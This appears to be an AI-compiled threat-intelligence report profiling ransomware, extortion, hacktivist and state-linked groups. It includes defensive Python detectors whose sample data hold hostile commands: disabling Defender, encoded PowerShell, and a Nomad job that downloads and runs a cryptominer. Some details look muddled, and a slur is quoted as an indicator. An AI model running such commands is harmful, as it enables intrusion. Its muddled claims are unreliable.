- Financially Motivated Actors: This category includes Ransomware-as-a-Service (RaaS) groups like DarkSide and REvil, which engage in ransomware operations.30 Lapsus$ is known for extortion and data dumping, while ShinyHunters specializes in selling stolen data on dark web marketplaces.30 The Dark Overlord focuses on data breaches and financial extortion, often releasing stolen information when demands are not met.30 Evil Corp is another financially driven group involved in theft and fraud.30
- Thrill-Seekers/Disruptive Groups: LulzSec, for instance, was known for chaotic hacking sprees and DDoS attacks, often for “lulz”.30 Lizard Squad gained notoriety for DDoS attacks on gaming networks.31
This diversity underscores the complex and multifaceted nature of the global cyber threat landscape, where motivations can range from political ideology and national interests to pure financial gain or even simple amusement.
Further Reading:
- https://www.youtube.com/watch?v=UgP0RaPzo0I 29
- https://www.webopedia.com/technology/famous-hacker-groups/ 30
- https://www.mysteriumvpn.com/blog/famous-hacker-groups 31
Threat Actor: World Leaks
World Leaks is a new extortion platform that emerged in early 2025, specifically on January 1, 2025.32 It was launched by the operators of the Hunters International ransomware group, and the two platforms share numerous similarities in design, layout, and functionality, suggesting World Leaks is either a side project or a backup plan.32 This development represents a strategic shift from traditional double extortion (which involves both data encryption and exfiltration) to an extortion-only model. This change was reportedly driven by increased risks and reduced profitability within the ransomware ecosystem, potentially due to enhanced law enforcement efforts and improved organizational defenses.32 However, despite claiming to be “extortion-only,” some victims have still experienced ransomware deployment on their systems, indicating that the group may not strictly adhere to its stated operational model.32
World Leaks operates as an Extortion-as-a-Service (EaaS) platform, providing affiliates with a self-developed exfiltration tool, which they claim is “100% fully undetectable”.32 The platform is structured across four distinct components:
- Main Data Leak Site (DLS): This acts as a “trophy wall,” showcasing victims’ data that has been published or is scheduled for publication. It lists claimed victims with a countdown timer indicating the deadline before data release.32
- Negotiation Site: A dedicated portal for victims to communicate with the attackers and facilitate ransom payments.32
- Insider Platform: A restricted area for journalists, offering 24-hour advance access to information about compromised victims, designed to amplify pressure on victims.32
- Affiliate Panel: A backend for the group’s affiliates.32
World Leaks employs a range of psychological pressure tactics to coerce victims into paying. The victim panel features a prominent countdown timer, a direct chat for communication with threat actors (who often initiate conversations to increase pressure), and a “Storage” tab displaying exfiltrated data for victims to validate the breach.32 Payments are demanded in Bitcoin to freshly generated addresses.32 Despite a stated “No Negotiation” policy on the payment tab, communication via the support chat is possible.32
The group has faced operational challenges, including initial bugs, downtime, and fluctuations in claimed data leak sizes, raising questions about data accuracy and the group’s professionalism.32 World Leaks has also been confirmed to be collaborating with the Secp0 ransomware group, highlighting the growing specialization and interconnectedness within the cybercrime ecosystem, where different groups provide services to each other.32 A notable victim is Kentfield Hospital in California, from which World Leaks claimed to have exfiltrated 146.4 GB of data, including protected health information (PHI) and medical images.33
Further Reading:
- https://blog.lexfo.fr/world-leaks-an-extortion-platform.html 32
- https://www.hipaajournal.com/surmodics-kentfield-hospital-cyberattacks/ 33
Threat Actor: (Clarification for “DigitalGhost”)
The term “DigitalGhost” in the query primarily refers to a profile on HackerOne, a bug bounty platform for security researchers, indicating a non-malicious entity.34 However, the context often conflates it with “Ghost Squad Hackers” (GSH), a distinct and malicious hacktivist group. If the query intends to refer to a malicious actor, it is likely Ghost Squad Hackers.
Threat Actor: Ghost Squad Hackers (GSH)
Ghost Squad Hackers (GSH) is a hacktivist group with origins in the Anonymous movement, led by a de facto leader known as ‘s1ege’.22 Their operations are primarily driven by political and ideological motivations, rather than financial gain.22
GSH has been active since at least 2016 and has engaged in numerous cyberattacks targeting governments, military entities, financial institutions, and media outlets. Their TTPs include Distributed Denial of Service (DDoS) attacks to disrupt services, website defacements, and data leaks.22 Notable campaigns include:
- Defacements: In January 2016, GSH defaced Ethiopian government websites in response to violence against students and activists.22
- DDoS Attacks: They targeted Donald Trump’s official website and hotel collection in May 2016 due to perceived racist comments.22
- Data Leaks: GSH gained notoriety for leaking data from the Israeli Defense Force in April 2016, including information on thousands of IDF soldiers and personnel.22 They also leaked U.S. Military personnel files, containing personal information and credit card numbers for nearly 2,437 army personnel.22
- Ideological Targets: The group has targeted organizations based on ideological opposition, taking down Ku Klux Klan websites in protest of racism and the Black Lives Matter website, claiming it fueled racism.22
- “Operation Icarus” (2016): In collaboration with Anonymous, GSH attacked central banking systems globally, including the Bank of England, New York Stock Exchange, and Bank of France. This operation aimed to protest corruption and “start an online revolution” against “elite banking cartels”.22
- “OpSilence” (2016): They targeted mainstream media outlets like CNN and Fox News for censoring coverage related to “OpIsrael”.22
GSH’s consistent focus on political and social issues, combined with their use of disruptive tactics and public data exposure, firmly places them within the hacktivist category.
Further Reading:
- https://en.wikipedia.org/wiki/Ghost_Squad_Hackers 22
- https://hackerone.com/digital_ghost 34
- https://podcasts.apple.com/cz/podcast/ghost-squad-hackers/id1585249019?i=1000636587679 35
Threat Actor: Handala Hack
Handala is an Iranian cyber group with direct links to Iran’s Ministry of Intelligence (MOIS).36 This group, along with Karma Below and Homeland Justice, is believed to be operated by a cyber unit within the MOIS’s counter-cyber threat division, primarily for advertising and influence purposes.36 Handala brands itself as pro-Palestinian and primarily conducts cyber operations and psychological warfare against Israel.37
The group has been active since at least April 2024, having launched 50 operations against Israeli and international targets in the past 10 months.37 A key characteristic of Handala’s operations is the frequent exaggeration or fictionalization of their hacks, a tactic common in Iranian cyber operations.37 This “perception hacking” aims to incite terror and panic, where the narrative of a successful attack can be as impactful as a technical breach.37 They may also republish publicly available data and present it as sensitive leaks.37
Their tactics, techniques, and procedures (TTPs) include:
- Exploiting Vulnerabilities: They leverage vulnerabilities in private company infrastructure, as seen in a January 2025 attack on Israeli kindergartens.36
- Mass Communication Abuse: Handala extensively uses systems to send mass threatening text messages to Israeli citizens. For example, in April 2024, after falsely claiming to breach Israel’s Iron Dome radar system, they sent hundreds of thousands of threatening messages.36
- Disruption of Public Systems: In the kindergarten attack, they disrupted public address (PA) systems and infiltrated emergency systems in at least 20 locations, causing red alert sirens to trigger, which are typically used for rocket warnings.36
- Alleged Data Exfiltration and Publication: In September 2024, they claimed to breach the Soreq Nuclear Research Center, alleging the theft of 197 gigabytes of data and publishing photos and screenshots, though Israeli authorities denied the authenticity of these claims.36 They also claimed to pilfer personal information from police officers and firefighters and breach Ministry of National Security systems, claims that were unsubstantiated by Israeli authorities.37
Handala’s close ties to Iranian intelligence and its focus on psychological warfare and terrorizing civilians reveal a state-sponsored agenda that extends beyond traditional espionage or financial gain. Their willingness to target critical civilian infrastructure and exploit public fear demonstrates a low ethical threshold in achieving their political objectives.
Further Reading:
- https://www.iranintl.com/en/202501265679 36
- https://www.fdd.org/analysis/policy_briefs/2025/02/03/iran-conducts-cyberattacks-to-terrorize-israelis/ 37
Threat Actor: (Clarification for “G_mic”)
The term “G_mic” does not refer to a specific named threat actor in the provided research. Instead, the snippets discuss how government-backed threat actors generally operate and their evolving use of generative AI 38, or refer to unnamed Russian groups 39 and the LummaC2 malware.40 If “G_mic” appears in the query, it likely serves as a generic descriptor for a sophisticated, potentially state-sponsored, threat.
Government-backed threat actors are highly sophisticated adversaries, often supported and protected by their respective nations.17 Their primary motivations are typically political or nationalistic, focusing on espionage, intelligence gathering, spreading disinformation, or disrupting critical infrastructure.17 These groups are characterized by their advanced capabilities, stealth, and persistence, making their activities particularly challenging to detect.17
Recent observations indicate that government-backed threat actors are experimenting with generative AI models, such as Gemini, to enhance their operations.38 However, current analysis suggests that AI is primarily used for productivity gains rather than for developing novel or unique attack techniques.38 Common AI use cases include troubleshooting code, conducting research (e.g., on potential infrastructure, free hosting providers, target organizations, and vulnerabilities), generating and localizing content, developing payloads, and assisting with malicious scripting and evasion techniques.38 While AI allows these actors to operate faster and at higher volume, it is currently an accelerant for existing TTPs rather than a revolutionary tool for new attack vectors. Attempts to abuse AI models for direct product exploitation or to elicit internal system information have largely been unsuccessful.38
An example of such a sophisticated, potentially government-backed actor is an unnamed Russian group believed to operate under the Foreign Intelligence Service (FSI).39 This group has been observed using new malware, “Wineloader,” in attacks against Western authorities, including breaching the email accounts of top Microsoft employees.39 Separately, the LummaC2 malware has been observed targeting U.S. critical infrastructure sectors, capable of infiltrating networks and exfiltrating sensitive information.40 The persistent targeting of high-impact sectors, whether for espionage, disruption, or pre-positioning, remains a key focus for these sophisticated adversaries.
Further Reading:
- https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai 38
- https://www.cisa.gov/news-events/alerts/2025/05/21/threat-actors-target-us-critical-infrastructure-lummac2-malware 40
- https://www.dw.com/en/russian-hackers-targeting-german-politicians-report/a-68648816 39
Threat Actor: (Clarification for “driver001”)
The term “driver001” does not refer to a specific threat actor in the provided research. Instead, the snippets identify two distinct, yet related, sophisticated actors: “EncryptHub” (also known as Water Gamayun or Larva-208) and “UNC3944.”
Threat Actor: EncryptHub (Water Gamayun, Larva-208)
EncryptHub is a prolific Russian threat actor, believed to be the work of a single individual, who became active in late June 2024.42 This actor has engaged in a “ransomware rampage,” infecting over 600 organizations.42 Their primary motivation is financial gain through ransomware operations.
EncryptHub’s tactics are characterized by high sophistication. They employ highly personalized spear-phishing as an initial access vector.42 A key aspect of their operations involves exploiting zero-day flaws, such as the Microsoft Management Console (MMC) framework vulnerability CVE-2025-26633 (also known as MSC Evil Twin).42 By manipulating .msc files and the MMC console’s Multilingual User Interface Path (MUIPath), EncryptHub is able to execute malicious code, establish persistence, and exfiltrate sensitive data from infected systems.42 This exploitation of a zero-day in a widely used Microsoft component underscores a significant capability in vulnerability research and exploitation.
Threat Actor: UNC3944
UNC3944 is a financially motivated threat actor that has been active since at least May of the current year.1 This group has been observed deploying Hive ransomware against targets in the medical industry 1 and is also linked to DragonForce ransomware, which later claimed control of RansomHub.25
UNC3944’s initial access often relies on credentials stolen from SMS phishing operations.1 A particularly concerning aspect of their TTPs is the abuse of legitimate Microsoft-signed drivers, such as Poortry and Stonestop malware, to bypass endpoint security products like antivirus and Endpoint Detection and Response (EDR).1 By using “attestation signing,” they make their malicious components appear trusted by Microsoft, significantly hindering detection.1 These drivers are then used to control, pause, or terminate various processes on targeted endpoints.1 Beyond ransomware, UNC3944 has also attempted to offer SIM swapping services.1 Their targeting profile is broad, including telecommunications, business process outsourcing (BPO) companies, managed security service providers (MSSPs), financial services, entertainment, and medical industries.1 The adoption of advanced evasion techniques, such as abusing legitimate, signed drivers, by a financially motivated group like UNC3944 demonstrates a critical shift in the cybercrime landscape, where sophisticated capabilities are no longer exclusive to state-sponsored actors. This means that even financially driven groups are capable of highly evasive and impactful attacks.
Further Reading:
- https://www.cybersecuritydive.com/news/russian-threat-actor-weaponizing-microsoft-management-console-zero-day/743558/ 42
- https://www.cybersecuritydive.com/news/threat-actors-microsoft-bypass-security/638698/ 1
- https://industrialcyber.co/ransomware/mandiant-links-dragonforce-ransomware-attacks-on-uk-retailers-to-unc3944-tactics-highlighting-links-to-ransomhub/ 25
Threat Actor: (Clarification for “gesss”)
The term “gesss” does not refer to a specific threat actor in the provided research. The snippets associated with this term provide general definitions of threat actors 41, mention a different actor named “Packrat” 43, discuss the historical hacker Markus Hess 44, and detail the DarkSide ransomware group.45 If “gesss” appears in the query, it is likely a misidentification or a generic placeholder.
However, the information provides valuable context on the motivations and targets of various threat actors. Threat actors are individuals or groups that conduct cyberattacks, and they are typically categorized by their motive, the type of attack they employ, and their targeted sector.41 Their primary objectives often include monetary gain, data acquisition, intelligence gathering, or causing service disruption and reputational damage to large organizations.41 Cybercriminals, for instance, are financially motivated and frequently use tactics like phishing.41 Nation-state actors, often well-resourced, engage in espionage or cyberwarfare, seeking to exfiltrate or corrupt sensitive data and disrupt critical infrastructure.41 Terrorist groups aim to cause harm and destruction to advance their cause, targeting critical services.41 Thrill-seekers attack for personal enjoyment, while insider threats, who have legitimate access, can be particularly damaging and difficult to detect.41
An example of a financially motivated group is the DarkSide ransomware group, which operated as a Ransomware-as-a-Service (RaaS).45 DarkSide claimed responsibility for a ransomware attack and data breach against clothing retailer Guess in early 2021, exfiltrating over 200GB of data.45 This group’s operations highlight the volatile nature of RaaS groups and the potential for affiliates to shift to new platforms or for groups to cease operations and potentially rebrand, making continuous monitoring essential.
Further Reading:
- https://www.sentinelone.com/cybersecurity-101/threat-intelligence/threat-actor/ 41
- https://misp-galaxy.org/threat-actor/ 43
- https://www.bankinfosecurity.com/guess-confirms-ransomware-attack-data-breach-a-17058 45
- https://en.wikipedia.org/wiki/Markus_Hess 44
Threat Actor: (Clarification for “BreachX”)
The term “BreachX” (or “BreachRx”) does not refer to a threat actor but rather to a legitimate cybersecurity incident response management (CIRM) platform.46 This platform is designed to help organizations respond to incidents with confidence, clarity, and speed, by automating and streamlining incident response processes across various business teams.46 This is a crucial distinction, as it represents a solution provider rather than a malicious entity.
The context provided highlights a significant shift in cybersecurity strategy: the move from reactive defense to proactive threat intelligence. Reactive cybersecurity, which primarily responds to alarms after a breach has occurred, is increasingly insufficient against sophisticated attackers.47 Instead, the focus is shifting towards detecting, analyzing, and validating unknown vulnerabilities before they become public, weaponized, or exploited.47 This proactive approach involves several key components:
- Dark Web Monitoring and Analysis: Continuously monitoring underground forums where sophisticated threat actors communicate, trade information, and discuss vulnerabilities and attack vectors.47
- Threat Actor Profiling and Attribution: Understanding who is targeting a specific industry and how they operate provides crucial context for developing effective defense strategies.47
- Vulnerability Discovery and Validation: Actively discovering vulnerabilities through automated analysis and security research, and validating which vulnerabilities pose genuine threats.47
- “Golden Window” Intelligence: Identifying the critical period between when a vulnerability exists and when it becomes publicly known or patched. Organizations with advanced intelligence can implement protective measures during this window, gaining a significant advantage.47
Artificial intelligence and machine learning play a vital role in this proactive shift, as advanced AI systems can analyze vast quantities of data from diverse sources—network traffic, dark web communications, vulnerability research, and threat actor behaviors—to identify patterns that human analysts might miss.47 Companies like BreachRx are pioneering this approach by combining real-time vulnerability discovery, dark web monitoring, and threat actor profiling to provide this crucial “Golden Window Intelligence”.47 This strategic shift is essential for enterprises to stay ahead of sophisticated attackers in a constantly evolving threat landscape.
Further Reading:
- https://www.breachrx.com/ 46
- https://medium.com/@pi._.ku/the-zero-day-intelligence-revolution-why-reactive-cybersecurity-is-dead-dde49a5df485 47
Threat Actor: RansomHub (Associated with “Ranssi” context)
The term “Ranssi” does not refer to a specific threat actor in the provided research. The extensive details are provided for the “RansomHub” ransomware group.
Threat Actor: RansomHub Ransomware Group
RansomHub is a prominent and technically advanced Ransomware-as-a-Service (RaaS) collective, first identified in February 2024.48 It is believed to be a successor or evolution of the Knight ransomware group, with apparent ties to former affiliates of the ALPHV ransomware group.48 RansomHub’s rapid growth is largely attributed to its innovative affiliate prepayment system. Unlike many other RaaS groups that operate on a revenue-sharing model, RansomHub requires affiliates to pay upfront to join the operation. This model ensures the group’s financial security while incentivizing affiliates to conduct attacks using RansomHub’s tools and infrastructure.48 The group’s primary motivation is financial gain through data encryption and exfiltration.48
RansomHub’s operations are methodical and employ a wide range of tactics, techniques, and procedures (TTPs) to maximize impact and minimize detection:
- Initial Access: They primarily exploit well-known vulnerabilities in public-facing applications, such as the Zerologon vulnerability (CVE-2020-1472) in Windows Servers, which allows them to bypass security measures and gain full control of domain controllers.48 Phishing, including personalized spear-phishing, is also used to gain initial access.48
- Execution & Lateral Movement: Once inside a network, RansomHub leverages Windows Management Instrumentation (WMI) to remotely execute commands and PowerShell for malicious scripts and disabling security measures.48 They frequently use legitimate tools like PsExec, Windows Remote Desktop Protocol (RDP), and Server Message Block (SMB) protocols for lateral movement, often with valid or compromised credentials.48 SSH, sometimes with utilities like PuTTY, Bitvise, or MobaXterm, is used for lateral movement, particularly to ESXi servers.49 They also employ Impacket’s smbexec utility 49, remote management software (e.g., Splashtop, Screenconnect), and tunneling tools (e.g., NGROK, RSOCX).49 Proxy malware like SYSTEMBC may also be used for lateral movement.49
- Persistence & Privilege Escalation: RansomHub maintains access by modifying or creating new user accounts (Account Manipulation, T1098) and exploits vulnerabilities in operating systems or applications to gain administrative-level access (Exploitation for Privilege Escalation, T1068).48
- Defense Evasion: They attempt to hide their presence by masquerading malicious files to appear legitimate (T1036), deleting or modifying logs and traces (T1070), and disabling security tools like antivirus software (T1562.001).48
- Credential Access & Impact: They extract sensitive credentials (e.g., password hashes, clear-text passwords) from compromised systems (OS Credential Dumping, T1003).48 In addition to encrypting data, RansomHub steals sensitive information (e.g., financial documents, client data, intellectual property). This data exfiltration is used to pressure organizations into paying a ransom to prevent public release, amplifying the urgency of their demands.48
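The TTPs listed above map directly onto host telemetry a defender already collects. The following is an added example, not code from the Cyble or Google profiles cited here: a small detector run over constructed, SIEM-normalised Windows event records (process creation 4688, service install 7045, account creation 4720, audit log cleared 1102) that flags WMI-spawned commands, obfuscated PowerShell, the PsExec service, new accounts, log clearing and Defender tampering. Field names, the sample records and the regexes are assumptions chosen for the example.

```python
"""Detection sketch for RansomHub-style execution, persistence, evasion and
lateral-movement TTPs. Added example; the event records below are
constructed, not real telemetry, and the field names assume a SIEM has
already normalised Windows events into flat dicts."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    technique: str   # ATT&CK ID plus a short label
    record_id: int   # which sample record triggered it
    detail: str      # the command line / account / service involved


# Constructed sample records (assumption: one dict per Windows event).
SAMPLE_EVENTS = [
    # WMI provider host spawning a shell: remote execution via WMI
    {"id": 1, "EventID": 4688, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    # Hidden, encoded PowerShell launched from a user session
    {"id": 2, "EventID": 4688, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    # PsExec drops and installs its service on the target host
    {"id": 3, "EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    # New local account created (Account Manipulation, T1098 on the page)
    {"id": 4, "EventID": 4720, "TargetUserName": "svc_backup2", "SubjectUserName": "jdoe"},
    # Security log cleared (T1070)
    {"id": 5, "EventID": 1102, "SubjectUserName": "jdoe"},
    # Real-time protection switched off from PowerShell (T1562.001)
    {"id": 6, "EventID": 4688, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    # Benign control record: should produce no finding
    {"id": 7, "EventID": 4688, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]

# Encoded / hidden-window / no-profile switches commonly seen in malicious scripts
SUSPICIOUS_PS = re.compile(r"(?i)(-enc(odedcommand)?\s|-w(indowstyle)?\s+hidden|-nop\b)")
# Defender or EDR service tampering from a shell
AV_TAMPER = re.compile(
    r"(?i)(Set-MpPreference.*-Disable|sc\s+(stop|config)\s+\S*(defend|sense)|net\s+stop\s+\S*defend)")


def detect(events):
    """Return a list of Finding objects for the records that match a rule."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        cmd = ev.get("CommandLine", "")
        parent = ev.get("ParentImage", "").lower()
        if eid == 4688 and parent.endswith("wmiprvse.exe"):
            findings.append(Finding("T1047 WMI remote execution", ev["id"], cmd))
        if eid == 4688 and "powershell" in ev.get("Image", "").lower():
            if AV_TAMPER.search(cmd):
                findings.append(Finding("T1562.001 disable AV/EDR", ev["id"], cmd))
            elif SUSPICIOUS_PS.search(cmd):
                findings.append(Finding("T1059.001 obfuscated PowerShell", ev["id"], cmd))
        if eid == 7045 and ev.get("ServiceName", "").upper() == "PSEXESVC":
            findings.append(Finding("T1569.002 PsExec service install", ev["id"], ev.get("ImagePath", "")))
        if eid == 4720:
            findings.append(Finding("T1098 account manipulation (new account)", ev["id"], ev["TargetUserName"]))
        if eid == 1102:
            findings.append(Finding("T1070.001 audit log cleared", ev["id"], ev.get("SubjectUserName", "")))
    return findings


def techniques_hit(events):
    """Sorted, de-duplicated ATT&CK IDs observed in the event set."""
    return sorted({f.technique.split()[0] for f in detect(events)})


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.technique}] record {f.record_id}: {f.detail}")
```

Each rule on its own is noisy (administrators also run PsExec and create accounts); the value is in correlating several of them on one host within a short window, which is the pattern the intrusion narrative above describes.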
RansomHub targets high-value organizations across various sectors globally, including aerospace and defense, energy, healthcare, government agencies, law enforcement, telecommunications, pharmaceuticals, and manufacturing.48 Their flexibility in targeting both small enterprises and multinational corporations helps maximize ransom payouts.48 The heavy reliance of ransomware groups, including RansomHub, on known vulnerabilities and legitimate tools for lateral movement and execution highlights that fundamental cyber hygiene practices, such as timely patching, implementing multi-factor authentication, enforcing strong access controls, and monitoring for the misuse of legitimate tools, remain critical defenses, even against sophisticated adversaries. The fact that zero-day exploitation for initial access is not commonly observed in these incidents further emphasizes the importance of addressing known security weaknesses.49
Further Reading:
- https://cyble.com/threat-actor-profiles/ransomhub-ransomware-group/ 48
- https://cloud.google.com/blog/topics/threat-intelligence/ransomware-attacks-surge-rely-on-public-legitimate-tools 49
Threat Actor: (Clarification for “AuraCorp malware developer”)
The term “AuraCorp malware developer” is a misidentification. “Aura” is a legitimate technology company that provides digital security solutions, including antivirus and anti-malware software, and is not a malware developer or a threat actor.50
Aura offers a comprehensive, all-in-one digital security solution that integrates financial, identity, network, and device protection.50 Their antivirus product is designed to secure devices from various types of malware, including viruses, spyware, trojans, ransomware, worms, and rootkits.51 It provides real-time scanning for new files and uses AI-powered Safe Browsing to block dangerous sites that may attempt to steal personal and financial information or deliver malware.51 Beyond malware protection, Aura’s services include identity theft protection with credit monitoring, online data removal, a Virtual Private Network (VPN) for secure browsing, a password manager, and parental controls.52 This suite of services aims to provide peace of mind by safeguarding individuals and families against a wide range of online threats.50
Further Reading:
- https://filecache.mediaroom.com/mr5mr_intrusta/177482/aura%20%281%29.pdf 50
- https://www.aura.com/antivirus 51
- https://www.aura.com/ 52
Threat Actor: JINX-0132 (Associated with “Wisetony” context)
The term “Wisetony” does not refer to a specific threat actor in the provided research. Instead, the relevant information details the activities of “JINX-0132.”
Threat Actor: JINX-0132
JINX-0132 is a threat actor primarily engaged in cryptojacking campaigns.53 This actor is notable for what is believed to be the first publicly documented instance of Nomad misconfigurations being exploited as an attack vector in the wild.53 They have also previously targeted exposed SeleniumGrid deployments in a campaign dubbed “SeleniumGreed”.53 Their general modus operandi involves exploiting misconfigurations in common cloud and DevOps tools to achieve remote code execution and deploy cryptominers.53 A distinctive behavioral indicator is their preference for using offensive slurs, such as “NIGNOG,” when naming defined task groups in their malicious jobs.53 The primary motivation for JINX-0132’s activities is financial gain through cryptojacking.53
The tactics, techniques, and procedures (TTPs) employed by JINX-0132 include:
- Exploitation of Misconfigurations: They abuse publicly exposed Nomad server HTTP APIs left in the default configuration, in which ACLs are disabled and job submission requires no authentication. This lets them register multiple new jobs on compromised hosts, each with a seemingly random job name but a consistent, offensive task group name.53
- Vulnerability Exploitation: JINX-0132 exploits Gitea instances vulnerable to Remote Code Execution (RCE), particularly where git hooks are enabled for a user, where the installation page is left unlocked (INSTALL_LOCK = false, which lets anyone reconfigure the instance), or where an old version with a known RCE such as 1.4.0 is in use.53
- Consul Misconfiguration Abuse: They also exploit Consul agents with enable_script_checks set to true while the HTTP API is reachable from beyond localhost. In that state anyone who can reach the API can register a health check whose script is an arbitrary command, which the agent then executes; HashiCorp’s guidance is to use enable_local_script_checks, which honours script checks only from local configuration files.53
- Payload Deployment: The primary payload observed is XMRig, a Monero cryptocurrency miner.53
Indicators of Compromise (IOCs) associated with JINX-0132’s activity include a specific XMRig hash, a Monero wallet address, and the distinctive “NIGNOG” Nomad Task Group definition name.53 Their targeting profile focuses on organizations with misconfigured cloud and DevOps environments, specifically exposed instances of Nomad, Gitea, and Consul.53 This reliance on exploiting misconfigurations, rather than complex zero-day vulnerabilities, highlights a critical attack vector that often goes unnoticed by traditional security measures, emphasizing the need for robust secure configuration management in modern IT environments.
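As an added example, not Wiz’s tooling or anything published about JINX-0132 beyond the task-group name above, the script below audits a Nomad agent configuration, a Consul agent configuration and Nomad job documents for the conditions just described. It assumes the agent configs are supplied in Nomad’s and Consul’s JSON configuration form with keys mirroring the HCL blocks (acl, plugin, tls; client_addr, enable_script_checks), and that job documents follow the shape returned by Nomad’s GET /v1/job/:id endpoint. The task-group check uses the IOC from the profile; the host-execution driver check and the miner-string and remote-artifact heuristics are general hardening assumptions, not statements about which driver or payload path this actor used, and every sample input is constructed.

```python
"""Offline audit of HashiCorp Nomad/Consul agent configs and Nomad job specs for
the misconfigurations and job-level indicators in the JINX-0132 profile.
Added example, not Wiz's or HashiCorp's code; all inputs below are constructed.
"""
from __future__ import annotations

import json
import re
from urllib.parse import urlparse

# Task-group name reported as a campaign IOC (matched case-insensitively).
IOC_GROUP_NAME = re.compile(r"nignog", re.IGNORECASE)
# Nomad drivers that execute commands directly on the client host (heuristic).
HOST_EXEC_DRIVERS = {"raw_exec", "exec"}
# Miner indicators: an XMRig binary name or a stratum pool URL (assumption).
MINER_HINTS = re.compile(r"xmrig|stratum\+tcp://", re.IGNORECASE)


def audit_nomad_agent(cfg: dict) -> list[str]:
    """Nomad agent config in JSON form; keys mirror the HCL blocks (assumed)."""
    findings = []
    if not cfg.get("acl", {}).get("enabled", False):
        # Nomad ships with ACLs disabled, so POST /v1/jobs needs no token.
        findings.append("nomad: acl.enabled is false; job submission is unauthenticated")
    raw_exec = cfg.get("plugin", {}).get("raw_exec", {}).get("config", {})
    if raw_exec.get("enabled", False):
        findings.append("nomad: raw_exec driver enabled; jobs can run unsandboxed host commands")
    # bind_addr defaults to 0.0.0.0; tls.http defaults to false.
    if cfg.get("bind_addr", "0.0.0.0") == "0.0.0.0" and not cfg.get("tls", {}).get("http", False):
        findings.append("nomad: HTTP API bound to all interfaces without TLS")
    return findings


def audit_consul_agent(cfg: dict) -> list[str]:
    """Consul agent config in JSON form."""
    findings = []
    client_addr = cfg.get("client_addr", "127.0.0.1")  # Consul default
    exposed = client_addr != "127.0.0.1"
    if cfg.get("enable_script_checks", False):
        # A check registered over the HTTP API may carry an arbitrary script,
        # which the agent executes; reachable off-host, that is remote code execution.
        reach = "reachable off-host" if exposed else "localhost only"
        findings.append(f"consul: enable_script_checks=true ({reach}); "
                        "prefer enable_local_script_checks, which ignores API-registered scripts")
    if exposed and not cfg.get("acl", {}).get("enabled", False):
        findings.append(f"consul: HTTP API on {client_addr} with ACLs disabled")
    return findings


def audit_nomad_job(job: dict) -> list[str]:
    """Job document as returned by GET /v1/job/:id (TaskGroups -> Tasks)."""
    findings = []
    job_id = job.get("ID", "?")
    for group in job.get("TaskGroups") or []:
        gname = group.get("Name", "")
        if IOC_GROUP_NAME.search(gname):
            findings.append(f"{job_id}: task group '{gname}' matches the campaign naming IOC")
        for task in group.get("Tasks") or []:
            where = f"{job_id}/{gname}/{task.get('Name', '')}"
            driver = task.get("Driver")
            if driver in HOST_EXEC_DRIVERS:
                findings.append(f"{where}: driver '{driver}' runs commands on the client host")
            for art in task.get("Artifacts") or []:
                src = art.get("GetterSource", "")
                if urlparse(src).scheme in ("http", "https"):
                    findings.append(f"{where}: downloads artifact from {src}")
            if MINER_HINTS.search(json.dumps(task.get("Config") or {})):
                findings.append(f"{where}: task config contains miner indicators")
    return findings


# --- constructed sample inputs: weak and hardened agents, one suspect and one benign job ---
NOMAD_AGENT_DEFAULT = {"bind_addr": "0.0.0.0", "acl": {"enabled": False},
                       "plugin": {"raw_exec": {"config": {"enabled": True}}}}
NOMAD_AGENT_HARDENED = {"bind_addr": "0.0.0.0", "acl": {"enabled": True}, "tls": {"http": True},
                        "plugin": {"raw_exec": {"config": {"enabled": False}}}}
CONSUL_WEAK = {"client_addr": "0.0.0.0", "enable_script_checks": True}
CONSUL_HARDENED = {"client_addr": "127.0.0.1", "enable_local_script_checks": True,
                   "acl": {"enabled": True, "default_policy": "deny"}}
SUSPECT_JOB = {"ID": "qzx91k", "TaskGroups": [{"Name": "NIGNOG", "Tasks": [{
    "Name": "run", "Driver": "raw_exec",
    "Config": {"command": "/bin/sh",
               "args": ["-c", "chmod +x local/x && local/x -o stratum+tcp://pool.example:3333"]},
    "Artifacts": [{"GetterSource": "http://198.51.100.7/x"}]}]}]}
BENIGN_JOB = {"ID": "web", "TaskGroups": [{"Name": "frontend", "Tasks": [
    {"Name": "nginx", "Driver": "docker", "Config": {"image": "nginx:1.27"}}]}]}

if __name__ == "__main__":
    for job in (SUSPECT_JOB, BENIGN_JOB):
        print(job["ID"], audit_nomad_job(job) or "clean")
```

The job audit is what a defender would run against the output of GET /v1/jobs on every reachable Nomad server: the IOC name check catches this campaign, while the driver and remote-artifact checks also catch the next operator who picks a less conspicuous task-group name.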
Further Reading:
- https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign 53
- https://www.youtube.com/watch?v=2Ucp64KpNi4 54
Threat Actor: (Clarification for “Wearerootsec”)
The term “Wearerootsec” does not refer to a specific threat actor in the provided research. The associated snippet lists several other hacker groups, offering a general overview of the diverse landscape of cyber adversaries.55
The landscape of hacker groups is vast and varied, encompassing entities with distinct motivations and capabilities. These include:
- The Shadow Brokers (TSB): Known for leaking hacking tools, including zero-day exploits, allegedly from the National Security Agency (NSA).55
- ShinyHunters: A group responsible for numerous data breaches, often selling stolen data on dark web marketplaces.55
- SiegedSec: A hacktivist group with anti-government and LGBTQ+-supportive stances, frequently targeting U.S. government agencies and law enforcement.55
- TeaMp0isoN: A black-hat computer hacking group.55
- UGNazi: A hacking group known for attacks on U.S. government sites, DDoS attacks, and exposing personal information of celebrities.55
- Vice Society: A Russian-speaking hacker group that targets healthcare and education organizations with ransomware.55
